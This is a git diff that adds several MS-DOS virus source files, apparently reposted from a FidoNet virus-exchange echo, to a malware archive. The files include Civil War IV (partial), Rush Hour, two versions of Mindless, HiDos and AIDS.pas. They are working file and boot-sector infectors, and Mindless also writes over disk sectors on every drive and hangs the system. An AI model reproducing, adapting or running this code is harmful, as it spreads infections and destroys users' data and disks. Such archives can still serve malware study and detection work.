; for infection + +;***************************************************************************** +; T P E * +;***************************************************************************** + +Encrypt: push bp ; BP = delta offset + ; push delta offset on stack + ; for later use. + + mov ax,cs ; Calculate worksegment + add ax,01000h + mov es,ax ; ES point to decrypt virus + + lea dx,[begin+bp] ; DS:DX begin encryption + + mov cx,len ; virus lenght + + mov bp,[lenght+bp] ; decryption starts at this + add bp,103h ; point + + xor si,si ; distance between decryptor + ; and encrypted code is 0 bytes + + call rnd_get ; AX = random value + call crypt ; encrypt virus + + pop bp ; BP = delta offset + ; get delta offset of stack + +;****************************************************************************** +; T P E - E N D * +;****************************************************************************** + +Write_virus: mov bx,[handle+bp] + mov ah,40h + int 21h + +Restore_date: mov ax,05701h + mov bx,[handle+bp] + mov cx,[time+bp] + mov dx,[date+bp] + int 21h + +Exit: mov ax,cs + mov ds,ax + mov es,ax + mov bx,0100h ; jump to start program + jmp bx + +;---------------------------------------------------------------------------- + +move_pointer: mov bx,[handle+bp] + xor cx,cx + xor dx,dx + int 21h + ret + +;---------------------------------------------------------------------------- +v_name db "Civil War IV v1.1, (c) Jan '93 " +com_mask db "*.com",0 +handle dw ? +date dw ? +time dw ? +buffer db 090h,0cdh,020h,044h,048h,00h +initials dw 4844h +lenght dw ? +jump db 0e9h,0 +message db "For all i've seen has changed my mind" + db "But still the wars go on as the years go by" + db "With no love of God or human rights" + db "'Cause all these dreams are swept aside" + db "By bloody hands of the hypnotized" + db "Who carry the cross of homicide" + db "And history bears the scars of our Civil Wars." +writer db "[ DH / TridenT ]",00 + + end dummy + +;-+- PPoint 1.86 +; + Origin: - = [ Brainstorm BBS ++31 (0)20-6108189 ] = - (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/yx Extended memory swapping +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir37.asm b/MSDOS/Virus.MSDOS.Unknown.vir37.asm new file mode 100644 index 00000000..6670f454 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir37.asm @@ -0,0 +1,313 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 27 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : RUSHHOUR.DSM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Dr T , 2:283/718 (06 Nov 94 16:49) +;* To : Clif Jessop +;* Subj : RUSHHOUR.DSM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org + PAGE 72,132 + TITLE Virus "RUSH HOUR" V1.0 (p) Foxi, 1986 + NAME VIRUS + +ABS0 SEGMENT AT 0 + ORG 4*10h +VIDEO_INT DW 2 DUP (?) ; Video Interrupt + + ORG 4*21h +DOS_INT DW 2 DUP (?) ; DOS Interrupt + + ORG 4*24h +ERROR_INT DW 2 DUP (?) ; ERROR Interrupt +ABS0 ENDS + +code SEGMENT + assume cs:code, ds:code, es:code + + ORG 05Ch +FCB LABEL BYTE +DRIVE DB ? +FSPEC DB 11 DUP (' ') ; Filename + ORG 6Ch +FSIZE DW 2 DUP (?) +FDATE DW ? ; date of last modifcation + +FTIME DW ? ; time of last mod + ORG 80h + DTA DW 128 DUP (?) ; Disk Transfer Area (DTA) + ORG 071Eh ; END OF THE NORMAL KEYBGR.COM + + xor ax, ax + mov es, ax ; ES points to ABS0 + assume es:ABS0 + + push cs + pop ds + + mov ax, VIDEO_INT ; store old interrupt vectors + mov bx, VIDEO_INT+2 + mov word ptr VIDEO_VECTOR, ax + mov word ptr VIDEO_VECTOR+2, bx + mov ax, DOS_INT + mov bx, DOS_INT+2 + mov word ptr DOS_VECTOR, ax + mov word ptr DOS_VECTOR+2, bx + cli + mov DOS_INT, OFFSET VIRUS ; new DOS vector points to VIRUS + + mov DOS_INT+2, cs + mov VIDEO_INT, OFFSET DISEASE ; video vector points to DISEASE + mov VIDEO_INT+2, cs + sti + + mov ah, 0 ; Get system time + int 1Ah ; read TimeOfDay (TOD) + mov TIME_0, dx ; CX:DX = number of clock ticks since midnight + + lea dx, VIRUS_ENDE + int 27h ; terminate program & remain resident (TSR) + +VIDEO_VECTOR DD (?) +DOS_VECTOR DD (?) +ERROR_VECTOR DW 2 DUP (?) +TIME_0 DW ? + +; +; VIRUS main program +; +; 1. System call AH=4BH? +; No: --> 2 +; Yes: Test for KEYBGR.COM on specified drive +; Already infected? +; Yes :--> 3. +; No : Infection! +; +; 2. Jump to normal DOS + +RNDVAL DB 'bfhg' +ACTIVE DB 0 ; not active +PRESET DB 0 ; first virus not active + + DB 'A:' +FNAME DB 'KEYBGR COM' + DB 0 + +VIRUS PROC FAR + assume cs:code, ds:nothing, es:nothing + + push ax + push cx + push dx + + mov ah, 0 ; check if at least 15 minutes + int 1ah ; have elapsed since installation. + + sub dx, TIME_0 + cmp dx, 16384 ; 16384 ticks on the clock=15 minutes + jl $3 + mov ACTIVE, 1 ; if so, activate virus + + $3: pop dx + pop cx + pop ax + + ; disk access because of the DOS command + ; "Load & execute program" ? + cmp ax, 4B00h + je $1 + +EXIT_1: + jmp DOS_VECTOR ; No: --> continue as normal + + $1: push es ; ES:BX --> parameter block + push bx ; DS:DX --> filename + push ds ; save registers which will be needed + push dx ; for INT 21H (AH=4Bh) + + mov DI, dx + mov DRIVE, 0 ; set the drive of the program + mov al, ds:[DI+1] ; to be executed + cmp al, ':' + jne $5 + + mov al, ds:[DI] + sub al, 'A'-1 + mov DRIVE, al + + $5: cld + push cs + pop ds + xor ax, ax + mov es, ax + assume ds:code, es:ABS0 + + mov ax, ERROR_INT ; ignore all disk "errors" + mov bx, ERROR_INT+2 ; with our own error routine + mov ERROR_VECTOR, ax + mov ERROR_VECTOR+2, bx + mov ERROR_INT, OFFSET ERROR + mov ERROR_INT+2, cs + + push cs + pop es + assume es:code + + lea dx, DTA ; DS:DX -> Disk Transfer Area (DTA) + mov ah, 1Ah ; SET DISK TRANSFER AREA ADDRESS + int 21h + mov bx, 11 ; transfer the filename + + $2: + mov al, fname-1[bx] ; into File Control Block (FCB) + mov FSPEC-1[bx], al + DEC bx + JNZ $2 + + lea dx, FCB ; open file (for writing) + mov ah, 0FH + int 21H + + cmp al, 0 + jne EXIT_0 ; file does not exist --> end + + mov BYTE PTR FCB + 20h, 0 + mov ax, FTIME ; file already infected? + cmp ax, 4800h + je EXIT_0 ; YES --> END + + mov PRESET, 1 ; (All copies are virulent !) + mov SI, 100H ; write the virus in the file + + $4: + lea DI, DTA + mov cx, 128 + REP MOVSB + lea dx, FCB ; DS:DX -> opened FCB + mov ah, 15h ; SEQUENTIAL WRITE TO FCB FILE + int 21h + + cmp SI, OFFSET VIRUS_ENDE + jl $4 + + mov FSIZE, OFFSET VIRUS_ENDE - 100H + mov FSIZE+2, 0 ; set correct file size + mov FDATE, 0AA3h ; set correct date (3-5-86) + mov FTIME, 4800h ; set time (09:00:00) + + lea dx, FCB ; close file + mov ah, 10h + int 21h + + xor ax, ax + mov es, ax + assume es:ABS0 + + mov ax, ERROR_VECTOR ; reset the error interrupt + mov bx, ERROR_VECTOR+2 + mov ERROR_INT, ax + mov ERROR_INT+2, bx + + EXIT_0: + pop dx ; restore the saved registers + pop ds + pop bx + pop es + assume ds:nothing, es:nothing + + mov ax, 4B00h ; "EXEC" - LOAD AND EXECUTE PROGRAM + jmp DOS_VECTOR ; normal function execution + +VIRUS ENDP + +ERROR PROC FAR + IRET ; simply ignore all errors... + +ERROR ENDP + +DISEASE PROC FAR + assume ds:nothing, es:nothing + push ax ; Save registers + push cx + + test PRESET, 1 + jz EXIT_2 + + test ACTIVE, 1 + jz EXIT_2 + + IN al, 61h ; Enable speak (Bit 0 := 0) + AND al, 0feh + OUT 61h, al + + mov cx, 3 ; index loop cx + NOISE: ; generate Noise + mov al, RNDVAL + xor al, RNDVAL + 3 + SHL al, 1 + SHL al, 1 + RCL WORD PTR RNDVAL, 1 + RCL WORD PTR RNDVAL+2, 1 + + mov ah, RNDVAL ; output some bit + and ah, 2 ; of the feedback + IN al, 61h ; shift register + and al, 0FDh ; --> noise from speaker + OR al, ah + OUT 61H, al + + LOOP NOISE + + and al, 0FCh ; turn speaker off + OR al,1 + OUT 61H, al + + EXIT_2: + pop cx + pop ax + jmp VIDEO_VECTOR ; jump to normal VIDEO routine ... + +DISEASE ENDP + + DB 'This program is a VIRUS program.' + DB 'Once activated it has control over all' + DB 'system devices and even over all storage' + DB 'media inserted by the user. It continually' + DB 'copies itself into uninfected operating' + DB 'systems and thus spreads uncontrolled.' + + DB 'The fact that the virus does not destroy any' + DB 'user programs or erase the disk is merely due' + DB 'to a philanthropic trait of the author......' + + ORG 1C2Ah + +VIRUS_ENDE LABEL BYTE + +code ends + + end + +;-+- Concord/QWK O.O1 Beta-7 +; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/os,/o,/op,/oiObject code: standard, standard w/overlays, Phar Lap, or IBM +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir38.asm b/MSDOS/Virus.MSDOS.Unknown.vir38.asm new file mode 100644 index 00000000..39c640f6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir38.asm @@ -0,0 +1,258 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 28 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : MINDLESS.DSM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mark Hapershaw, 2:283/718 (06 Nov 94 16:49) +;* To : Hans Schotel +;* Subj : MINDLESS.DSM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mark.Hapershaw@f718.n283.z2.fidonet.org +; The Mindless V1.0 Virus +; +; Type: *.COM Overwriter +; +; Programmer: Natas Kaupas + +; Notes: +; +; Read the texts that come with this for all of the necessary +; info...if you've got any questions contact me on any YAM Dist. Sites. +; +; I Couldn't Have Made This Without: +; +; Soltan Griss -Kode4 +; Data Disruptor -encrypted part +; Mr. Mike -typematic delay thing +; And Everyone I Forgot! + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + org 100h + + +MINDL proc far +start label near + db 0E9h,00h,00h + +vstart equ $ + + mov cx,09EBh ;debug killer + mov ax,0FE05h ; + jmp $-2 ; + add ah,03Bh ; + jmp $-10 ; + + push ds ;save old data segment + sub ax,ax ;put zero in ax + push ax ;save it on stack + + mov ah,2ah ;get date + int 21h + cmp al,0 ;is it a Sunday? + jne rater ;no...don't format then + +doom: + mov ax,3301h ;turn off ^C Check + xor dl,dl ;0 + int 21h + + mov cx,lident ;this all has to do with the encrypted + mov si,offset ident ;message + mov di,offset dest ; +doshit: + mov al,ds:[si] ;unencrypt message + mov temp,al ; + xor byte ptr ds:[temp],01h ; + mov al,temp ; + mov [di],al ; + inc si ; + inc di ; + loop doshit ;loop back and finish it +doomb: + cmp drive,27 ;format all drives + jge boot ;done...then end (boot) + pushf ;push flags on + mov al,drive ;find drive + mov cx,sectors ;find sectors + mov dx,0 ;start at sector 0 + mov bx,offset dest ;write encrypted message + int 26h ;format + popf ;pop flags off + inc drive ;go up to next drive + jmp doomb ;repeat + +;this was originally going to boot...but for some reason it couldn't format in +;time (before the boot), so it didn't format...oh well. + +boot: + mov dl,2ch ;get system time + int 21h + and dl,0Fh ;AND 100th seconds by 0Fh + or dl,dl ;0? + jz locker ;yes..then lock up system + + mov cx,1980 ;date, 1980 + mov dx,0 ;mon/day, 0 + mov ah,2Bh ;set date + int 21h + mov cx,0 ;hrs/min, 0 + mov dx,0 ;sec, 0 + mov ah,2Dh ;set time + int 21h + mov ax,3301h ;turn ^C Check back on + mov dl,1 ;1 + int 21h + mov ax,4c00h ;end with error message 00 + int 21h + +locker: + jmp $ ;lock up computer + +rater: + mov al,dl + mov dl,0c0h ;unkown ms, really grinds on mine though! + jz valid ;it must be around 15ms + ;which is slow considering default is 9ms + ;and most floppies can actually go under 6ms + +valid: + push ds ;Save the data segment + mov bx,78h ;point to pointer for floppy drive tables + mov ax,0 + mov ds,ax ;set to segment 0 + mov ax,[bx] ;get the pointer + mov bx,ax ;into the bx register + mov al,[bx] ;now get the present step rate + and al,0fh ;remove the old step rate + or al,dl ;put in the new step rate + mov [bx],al ;and put it back where it goes + mov ah,0 ;now call on the BIOS to + int 13h ;reload the set floppy disk controller + pop ds ;Reset the Data Segment + +go_on: + + push ds ;save present data segment + + mov bx,78h ;point to pointer for floppy drive tables + mov ax,0 + mov ds,ax ;set to segment 0 + mov ax,[bx] ;get the pointer + mov bx,ax ;into the bx register + mov al,[bx] ;now get the step rate + pop ds + push ax ;save the step rate on the stack + + +typematic: + mov bl,repeat ;get the parameters + mov bh,init ; + mov ax,305h ;set typematic rate and delay + int 16h ; + xor al,al ;errorlevel = 0 + +n_start: mov ah,4Eh ;Find first Com file in directory + mov dx,offset filename ;use "*.com" + int 21h + +Back: + mov ah,43h ;get rid of read only protection + mov al,0 ; + mov dx,9eh ; + int 21h ; + mov ah,43h ; + mov al,01 ; + and cx,11111110b ; + int 21h ; + + mov ax,3D01h ;Open file for writing + mov dx,9Eh ;get file name from file data area + int 21h + + mov bx,ax ;save handle in bx + mov ah,57h ;get time date + mov al,0 + int 21h + + push cx ;put in stack for later + push dx + + + mov dx,100h ;Start writing at 100h + mov cx,(vend-vstart) ;write ?? bytes + mov ah,40h ;Write Data into the file + int 21h + + + pop dx ;Restore old dates and times + pop cx + mov ah,57h + mov al,01h + int 21h + + + + mov ah,3Eh ;Close the file + int 21h + + mov ah,4Fh ;Find Next file + int 21h + + jnc Back + +done: + + int 20h ;Terminate Program + +V_Length equ vend-vstart + +drive db ? +sectors dw 456 + +filename db "*.c*",0 + +ident db "ZXntofrudsr!@f`horu!Lb@ggdd\!,O@U@R!J@TQ@R",13,10 + db "Uid!Lhoemdrr!Whstr!w0/1!",13,10 + +;encrypted message: +;ident db "[Youngsters Against McAffee] -NATAS KAUPAS",13,10 +; db "The Mindless Virus v1.0 ",13,10 + +lident equ $-ident +dest db [lident-1/2] dup (?) +temp db 0 + +repeat equ 250 +init equ 0 + +mindl endp + +vend equ $ + +seg_a ends + + end start + +;-+- GoldED/386 2.50.B1016+ +; + Origin: ViRUS PaRk BbS >916< 387-6159 24HouRs (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/L Specify library search paths +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir39.asm b/MSDOS/Virus.MSDOS.Unknown.vir39.asm new file mode 100644 index 00000000..044a2fcd --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir39.asm @@ -0,0 +1,246 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 29 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : HIDOS.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:50) +;* To : Doug Bryce +;* Subj : HIDOS.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org + NAME boot + PAGE 55,132 + TITLE FILE UTIL + + + + +code segment + + ASSUME CS:CODE,DS:CODE,ES:CODE + + org 100h + +main: jmp over + db '[' +id db 'HiDos]',0 +by db 'By Apache',0 +over: xor ax,ax + mov ds,ax + cli + mov ss,ax + mov sp,7c00h + sti + mov ax,ds:[004eh] + mov word ptr ds:[int13+7b02h],ax + mov ax,ds:[004ch] + mov word ptr ds:[int13+7b00h],ax + mov ax,ds:[0413h] + dec ax + dec ax + mov ds:[0413h],ax + mov cl,06h + shl ax,cl + mov es,ax + mov word ptr ds:[bigj+7b02h],es + mov ax,offset jumpt + mov word ptr ds:[bigj+7b00h],ax + mov cx,0400h + push cs + pop ds + mov si,7c00h + mov di,0100h + cld + repz + movsb + push cs + pop ds + jmp cs:[bigj+7b00h] + +jumpt: push cs + pop ds + mov si,offset drive + cmp byte ptr ds:[si],80h + jz hdone + mov bx,0300h + mov cx,0001h + mov dx,0080h + push cs + pop es + call hdread + cmp ds:[0304h],'iH' + jz hdone + mov bx,0300h + mov cx,0007h + mov dx,0080h + call hdwrit + mov si,04beh + mov di,02beh + mov cx,0042h + cld + repz + movsb + mov byte ptr ds:[drive],80h + mov bx,0100h + mov cx,0001h + mov dx,0080h + call hdwrit + mov byte ptr ds:[drive],00h + +hdone: xor ax,ax + mov word ptr cs:[boot+2],ax + mov es,ax + push cs + pop ds + mov ax,0201h + mov bx,7c00h + mov word ptr ds:[boot],bx + mov si,offset drive + cmp byte ptr ds:[si],80h + jz hload + mov cx,0003h + mov dx,0100h + jmp fload +hload: mov cx,0007h + mov dx,0080h +fload: mov di,'rv' + int 13h + mov si,offset drive + mov byte ptr cs:[si],00h + xor ax,ax + mov es,ax + mov ds,ax + mov ax,offset nint13 + mov ds:[004ch],ax + mov ds:[004eh],cs + push cs + pop ds + jmp cs:[boot] + +hdwrit: mov ax,0301h + mov di,'rv' + jmp xx4 +hdread: mov ax,0201h + mov di,'rv' +xx4: int 13h + ret + +nint13: cmp di,'rv' + jz iv13 + cmp ah,02h + jnz wcheck + cmp cl,01h + jnz wcheck + cmp dh,00h + jnz wcheck + cmp dl,80h + jz check1 + cmp dl,00h + jnz wcheck +check1: push ax + push bx + push cx + push dx + push ds + push es + push di + mov bx,0300h + push cs + pop es + call hdread + mov si,offset [id+0200h] + cmp es:[si],'iH' + jz redirect + jmp iflopd +redirect: cmp dl,80h + jnz rdirfl + pop di + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + mov cx,0007h + jmp a13 + +rdirfl: pop di + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + mov cx,0003h + mov dx,0100h +a13: mov ax,0201h +iv13: jmp v13 + + +wcheck: cmp ah,03h + jnz v13 + cmp dl,00h + jnz v13 + push ax + push bx + push cx + push dx + push ds + push es + push di + push cs + pop es + mov bx,0300h + mov cx,0001h + xor dx,dx + call hdread + mov si,offset [id+0200h] + cmp es:[si],'iH' + jz iflopd + mov cx,0003h + mov dx,0100h + mov bx,0300h + call hdwrit + mov bx,0100h + xor dx,dx + mov cx,0001h + call hdwrit +iflopd: pop di + pop es + pop ds + pop dx + pop cx + pop bx + pop ax +v13: db 0eah +int13 dd 0h +drive db 0h +bigj dd 0h +boot dd 0h + +code ends + +end main + +;-+- GEcho 1.10+ +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/i Initialize all segments +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir40.asm b/MSDOS/Virus.MSDOS.Unknown.vir40.asm new file mode 100644 index 00000000..c31fce68 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir40.asm @@ -0,0 +1,220 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 30 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : MINDLESS.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 16:51) +;* To : Gilbert Holleman +;* Subj : MINDLESS.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org +; + + + +mindless segment byte + assume cs:mindless,ds:mindless,ss:mindless + + org 100h + +victem equ 09Eh + +yam proc near + + jmp virus_fix ;location of victem name +yam endp + +virus_fix proc near + ;attempt crashing debugger + mov cx,09ebh ;fake command + mov ax,0fe05h ;fake command + jmp short $-2 ;do real commands + + adc ah,3bh ;fake command + jmp short $-10 ;do real commands + + + push ds + xor ax,ax ;instead of XORring ax, you + ;should work out it's alue + ;after the above mess, then + ;subtract it so noone knows + ;it's real value. + + push ax + mov ah,2ah ;Get system date + int 21h + + cmp al,0 ;Is it Sunday? + jne not_sunday ;not sunday? no damage then.. + +start_damage: + mov ax,3301h ; + xor dl,dl ;determine ctrl/break state + int 21h + + mov cx,msg_length ;prepare to write our messag + lea si,message ;These are the bytes to move + +decrypt_message: + mov al,byte ptr [si] ;get byte to decrypt + xor al,1 ;xor it with 1 + mov byte ptr [si],al ;store it + inc si ;go to next cypher + loop decrypt_message ;get another character + +damage: + cmp byte ptr drive_num,27 ;have we past drive z? + ja no_more_disks ;if yes, exit damage routine + pushf ;don't let flags be altered + mov al,byte ptr drive_num + mov cx,word ptr num_secs + xor dx,dx ;first sector + lea bx,message ;data to write + int 26h ;absolute write to disk + popf ;restore flags + inc byte ptr drive_num ;try another drive + jmp short damage ; + +no_more_disks: + mov dl,2ch ;check ctrl/C state + int 21h + and dl,0fh + or dl,dl ;Set Flags + je hang_machine + mov cx,1980 ;prepare system year + xor dx,dx ;prepare system month and day + mov ah,2bh ;Set system date + int 21h + xor cx,cx ;prepare system hour/minute + xor dx,dx ;prepare system seconds + mov ah,2dh ;Set system time + int 21h + mov ax,3301h ;check/set ctrl/C status + mov dl,01 + int 21h + mov ax,4c00h ;Drop to DOS, no error code + int 21h + +; +; + + +hang_machine: + jmp $ + +not_sunday: + mov al,dl + mov dl,0c0h + push ds + mov bx,78h + xor ax,ax + mov ds,ax ; ds=0 + mov ax,word ptr [bx] + mov bx,ax + mov al,byte ptr [bx] + and al,0fh + or al,dl + mov byte ptr [bx],al + xor ah,ah ;reset drive + int 13h + pop ds ;restore ds + + push ds ;keep it stored, though + mov bx,78h + xor ax,ax + mov ds,ax ;ds=0 + mov ax,word ptr [bx] + mov bx,ax + mov al,byte ptr [bx] + pop ds ;restore ds + + push ax + mov bx,0fah ;ultra hi speed?? + mov ax,0305h ;Adjust keyboard rate/delay + int 16h + + mov ax,4e00h ;DOS Search_First + lea dx,com_file ;Look for a COM file + int 21h + +infect: + mov ax,4300h ;get/set file attribs + mov dx,offset victem + int 21h + mov ax,4301h ;get/set file attribs + and cx,00feh ; + int 21h + mov ax,3d01h ;open file + mov dx,offset victem + int 21h + mov bx,ax ;file handle + mov ax,5700h ;get file time + int 21h + push cx ;store it + push dx ;stor it + mov dx,0100h + mov cx,01a7h + mov ah,40h + int 21h ;write file using file handle + pop dx + pop cx + mov ax,5701h + int 21h ;set file date & time + mov ah,3eh ;close file via handle + int 21h + mov ah,4fh ;DOS Search_Next + int 21h + ja infect ;infect if good one found + int 20h ;bail out + +drive_num db 0 +num_secs dw 20 ;should be enough to kill with + +com_file db '*.COM',0 ;'*.c*' leaves too much room + ; for error. + +; This was not encrypted properly!! +; I have corrected what I could figure out. + +message db 0fah ;??What's this?? + + db 'Xntmfrsddr!' ;Youngsters + db '@f`hmrs!' ;Against + db 'Lb@eedd' ;McAffee + + db '\!,' + db 'O@U@R!L@TO@T' ;NATAS KAUPAS + + db 0ffh,0ffh ;spaces (cr/lf not useful...) + + db 'Uid!Lhoemdrr!Whstr!w1/0!' ;virus name, version +msg_length equ $-message + + +virus_fix endp +mindless ends + end yam + +;-+- Terminate 1.50/Pro +; + Origin: Hard disks never die... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/P[=NNNNN] Pack code segments +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir41.pas b/MSDOS/Virus.MSDOS.Unknown.vir41.pas new file mode 100644 index 00000000..f698589c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir41.pas @@ -0,0 +1,168 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 31 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : AIDS.PAS +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mike Nisbett, 2:283/718 (06 Nov 94 16:52) +;* To : Alan Jones +;* Subj : AIDS.PAS +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mike.Nisbett@f718.n283.z2.fidonet.org +{C-} +{U-} +{I-} { Won't allow a user break, enable IO check } + +{ -- Constants --------------------------------------- } + +Const + VirusSize = 13847; { AIDS' code size } + + Warning :String[42] { Warning message } + = 'This File Has Been Infected By AIDS! HaHa!'; + +{ -- Type declarations------------------------------------- } + +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; + +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; + +{ -- Variables--------------------------------------------- } + +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : Integer; {Will loop forever} + +{ -- Program code------------------------------------------ } + +Begin + GetDir(0, UsePath); { get current directory } + if Pos('\', UsePath) <> UsePathLenght then + UsePath := UsePath + '\'; + UsePath := UsePath + '*.COM'; { Define search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); { Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B > 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID <> Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin +Writeln(''); {Give a lot of smiles} +Writeln(''); +Writeln(' @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @'); +Writeln(' @ ATTENTION: @'); +Writeln(' I have been elected to inform you that throughout your process of '); +Writeln(' @ collecting and executing files, you have accidentally HK @'); +Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot '); +Writeln(' @ be; YES, it CAN be, a s has infected your system. Now what do @'); +Writeln(' you have to say about that? HAHAHAHA. Have H with this one and '); +Writeln(' @ remember, there is NO cure for @'); +Writeln(' '); +Writeln(' @ @'); +Writeln(' ۱ ۱ ۱ ۱ '); +Writeln(' @ ۱ ۱ ۱ ۱ ۱ ۱ @'); +Writeln(' ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln(' @ ۱ ۱ ۱ ۱ @'); +Writeln(' ۱۱ ۱ ۱ ۱ ۱ '); +Writeln(' @ ۱ ۱ ۱ ۱ ۱ ۱ @'); +Writeln(' ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln(' @ ۱ ۱ ۱ ۱ @'); +Writeln(' '); +Writeln(' @ @'); +Writeln(' @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @'); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + + +{ Although this is a primitive virus its effective. } +{ In this virus only the .COM } +{ 